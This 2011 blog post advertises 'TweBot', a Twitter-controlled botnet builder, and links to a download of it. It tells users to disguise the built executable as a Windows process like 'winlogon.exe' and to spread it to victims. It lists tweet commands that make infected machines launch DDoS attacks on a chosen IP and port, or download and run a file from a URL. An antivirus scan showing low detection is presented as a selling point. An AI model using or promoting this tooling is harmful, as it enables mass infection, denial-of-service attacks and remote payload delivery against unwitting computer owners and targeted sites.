Tuesday, 3 May 2011

Twitter Bot

Tweet & Control botnets
A botnet is a collection of software agents, or robots, that run autonomously and automatically. The term is most commonly associated with IRC bots and more recently malicious software, but it can also refer to a network of computers using distributed computing software.



[Image: idUmaQ.png]
 

Information:


TweBot is coded and created by KORRUPT, it is coded in Visual Basic 6 so you have the small dependency of .OCX files which come with all Windows Operation Systems. The builder is created in Visual Basic .NET Framework 4.0 and will require the latest framework to run. As there is no longer a constant "Syntax", the bot cannot be generally searched and found as it could in previous versions.

Steps for usage:
1. If you haven't already or would like to keep your commands to a different account, create a new twitter account, http://twitter.com/.

2. Open the builder, you will be required to fill in the following:

"Twitter Username", this is your Username that you signed up with.

"File Name", this will be the output .exe for the server, it will also be the name of the service added to startup. I would recommend naming it something similar to a windows process such as "winlogon.exe", you can rename the original file if you wish.

"Interval", this is the time in seconds that the server checks your Twitter page for new commands, so for example if you set 30 seconds, the bot would check every 30 seconds, if there is a new command, it will execute it.

3. Build your server by clicking the button.

4. Spread the .EXE to victims, and once infecting you may execute commands via. Twitter.

5. Simply tweet any of the following commands:

Command: [IP] [PORT]
Example: 173.194.37.104 80
Description: DDoS 173.194.37.104 (Google) on port 80.

Command: STOP
Example: STOP
Description: Stops all current DDoS attacks.

Command: [Direct File URL]
Example: http://sharecash.org/download.php?file=1761170
Description: Would download "FILE.exe" to %TEMP% then execute it.

Command: (URL)
Example: google.com
Description: Would visit google.com in the users default browser, NOTE: Do NOT include "http://" in the command!


Stub Scan:
File Info

Report date: 2011-01-07 19:26:27 (GMT 1)
File name: stub-exe
File size: 40960 bytes
MD5 Hash: 867dfe7781e0173ddde0b26b0c961916
SHA1 Hash: 29ce1537d68b1a95c2e4b9a4fd74e25dc58ec6e5
Detection rate: 4 on 16 (25%)
Status: INFECTED

Detections

a-squared -
Avast -
AVG -
Avira AntiVir - TR/ATRAPS.Gen
BitDefender - Dropped:Generic.Malware.Sdld.7CEB4D5D
ClamAV -
Comodo -
Dr.Web -
F-PROT6 -
Ikarus T3 -
Kaspersky - HEUR:Trojan.Win32.Generic
NOD32 - Win32/Injector.ANB
Panda -
TrendMicro -
VBA32 -
VirusBuster -

Scan report generated by
NoVirusThanks.org

Download: Twitter Bot

No comments:

Post a Comment